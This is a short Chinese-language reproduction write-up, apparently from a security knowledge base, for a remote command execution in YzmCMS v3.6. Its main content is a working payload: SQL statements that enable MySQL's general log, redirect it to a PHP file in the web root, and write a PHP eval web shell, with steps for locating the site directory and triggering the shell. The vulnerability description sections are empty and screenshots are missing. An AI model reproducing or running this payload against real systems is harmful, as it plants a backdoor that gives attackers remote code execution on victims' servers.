YzmCMS v3.6 远程命令执行

一、漏洞简介

二、漏洞影响

YzmCMS v3.6

三、复现过程

Payload:

show variables like '%general%';   #查看配置
set global general_log = on;        #开启general log模式
set global general_log_file =CONCAT("E:\\study\\WWW\\YzmCMS\\test.","php"); 
select '<?php eval($_POST[cmd]);?>';   #写入shell
1、执行sql语句,查看mysql日志配置情况

image

2、根据日志文件位置或者默认站点路径来推测站点目录,可用load_file()函数来测试,确认站点目录位置。或者通过phpinfo()等信息收集获取站点目录。

image

3、分别执行下列sql语句,将脚本代码写入文件:

set global general_log = on;         

set global general_log_file =CONCAT("E:\\study\\WWW\\YzmCMS\\test.","php"); select '<?php eval($_POST[cmd]);?>';

image

4、提交参数,执行脚本代码:

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-02-11 16:43:19

results matching ""

    No results matching ""